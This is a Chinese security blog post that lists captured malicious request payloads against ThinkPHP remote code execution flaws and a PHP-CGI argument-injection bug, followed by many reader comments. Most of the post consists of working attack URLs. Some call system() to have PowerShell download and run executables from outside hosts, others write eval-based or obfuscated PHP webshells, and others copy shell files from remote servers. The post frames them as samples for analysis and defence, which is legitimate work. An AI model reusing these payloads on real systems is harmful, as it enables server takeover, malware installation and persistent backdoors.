OnionT@KillBoy
4814,4194字数 0阅读0分0秒阅读模式
AI智能摘要
你是否意识到,一个看似普通的URL参数可能正悄悄打开服务器的后门?本文深度解析ThinkPHP远程代码执行漏洞的常见恶意payload,揭露攻击者如何通过精心构造的请求实现文件下载、WebShell写入、远程控制等致命操作。从解码混淆命令到绕过安全机制,带你透视攻击链条的每一环,掌握这些真实案例,为你的系统筑牢防线。
— AI 生成的文章内容摘要
1.
解码后:
/public/index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/bmlhggsflrnrend14224.exe');start %SystemRoot%/Temp/bmlhggsflrnrend14224.exe
/public/index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fk.openyourass.club/download.exe','%SystemRoot%/Temp/fppayjgrzdamwig20150.exe');start%20%SystemRoot%/Temp/fppayjgrzdamwig20150.exe //?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); //index.php?s=index///think//Container/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://www.520yxsf.com/shell.txt&vars[1][]=libsoft.php //?s=index//think/template/driver/file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?> //?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> //?s=index//think/template/driver/file/write&cacheFile=robots1.php&content=xbshell<?php%20@eval($_POST[admin]);?> /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://43.255.29.112/php/dd.txt&vars%5B1%5D%5B%5D=dp.php /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 /public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php //index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://43.255.29.112/php/dd.txt&vars%5B1%5D%5B%5D=dp.php
2.cgi-bin漏洞
/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
还在陆续整理中。。。。
吉林省辽源市 1F
这种payload看着就头大
山西省忻州市 2F
之前遇到过类似的,折腾了好久才搞定
湖北省潜江市 3F
有人试过这个在Windows上能跑吗
上海市 4F
感觉这些恶意payload挺危险的
河北省保定市阜平县 B1
@ 熊猫掉毛 危险是危险,但主要看有没有防护。
福建省漳州市 5F
为啥要用powershell下载exe文件呢
日本 B1
@ 朝阳 powershell确实方便,能绕过一些检测。
陕西省汉中市 6F
这个thinkphp漏洞现在还有效吗
韩国 7F
payload里变量名取得真随意
台湾省 8F
看到这些代码就想起被漏洞支配的恐惧
湖北省十堰市 B1
@ 优雅的孔雀 同感,看到这种代码就条件反射想找日志。
韩国 9F
有没有更简单的payload演示
山东省淄博市 10F
这些payload都是远程执行命令的吗
湖北省武汉市 11F
这种直接下载执行的payload也太明目张胆了。
重庆市 12F
看着像是一些老漏洞的利用方式。
湖北省武汉市 13F
之前修网站的时候还真见过类似的,赶紧打了补丁。
韩国 14F
代码确实看着挺唬人的,实际利用起来门槛不低吧?
广东省 B1
@ 星奈绪 唬人是唬人,但真遇到没打补丁的站,一条就进去了。
韩国 15F
这种一般用来干啥的?挖矿还是勒索?
浙江省台州市路桥区 16F
payload看着多,其实原理都差不多,就是执行外部命令。
上海市 B1
@ 青瓷岁月 里面那个copy远程txt写shell的操作,现在还能用?
印度尼西亚 17F
有没有办法能批量检测这种漏洞呢?
日本 18F
这种payload看着都差不多,都是远程执行命令那套。
乌克兰 19F
你 真正 启发人心。不要放弃! [url=https://iqvel.com/zh-Hans/a/%E5%8C%88%E7%89%99%E5%88%A9/%E5%9F%83%E6%A0%BC%E5%B0%94%E5%9F%8E%E5%A0%A1]多瑙河彎[/url] 关注更新, 我明白, 世界很美。由衷感谢 旅行气氛。
福建省三明市 20F
看着有点复杂,新手表示看不懂。
浙江省台州市临海市 21F
powershell那部分是不是用来绕过检测的?
贵州省贵阳市 22F
之前做渗透测试的时候用过类似的,现在好多都失效了。
广东省广州市 23F
这图片做的还挺有感觉的,数据流的样子。
福建省泉州市 24F
里面有几个payload确实挺老的,现在用估计会被秒拦。
巴基斯坦 25F
这些代码格式看着好乱,能不能整理一下啊。
宁夏 26F
感觉分享这种payload有点危险啊,会不会被有心人利用。
浙江省宁波市 B1
@ 绝杀之王 分享这种确实有风险,但安全人员也需要样本分析啊。
贵州省贵阳市 27F
有没有针对这些payload的防护方案?
北京市 28F
老用户表示,这种整理看看就好,真遇到还得具体分析。
香港 29F
这网址看着就不对劲啊。
北京市 B1
@ TinyWhiskers 我也觉得,明显有问题。
重庆市 30F
这不就是RCE的老套路嘛,换汤不换药。
河北省承德市 31F
看着一堆urldecode和base64就头疼,绕过手法倒是挺花的。
福建省厦门市 32F
新手问下,这种payload一般怎么触发啊?是访问链接就行吗?
北京市 33F
之前公司服务器被类似的东西搞过,半夜报警吓死人。
澳大利亚 34F
能不能别放真实下载链接啊,有点慌🤔
澳大利亚 35F
这些基本都是ThinkPHP那几个经典洞吧,5.0.x那会儿烂大街了。
印度 36F
感觉现在WAF都能直接拦住,除非没开防护。
山东省枣庄市 37F
图片做得还行,数据流那种氛围感拉满了👍
广东省阳江市 38F
这个域名有点东西啊 openyourass.club
吉林省长春市九台市 B1
@ SavageGrace 这域名起得也太直白了
广东省 39F
为啥非得用cmd.exe再套powershell?直接ps不行?
湖北省武汉市 40F
老运维表示看到%SystemRoot%/Temp就条件反射删文件了hhh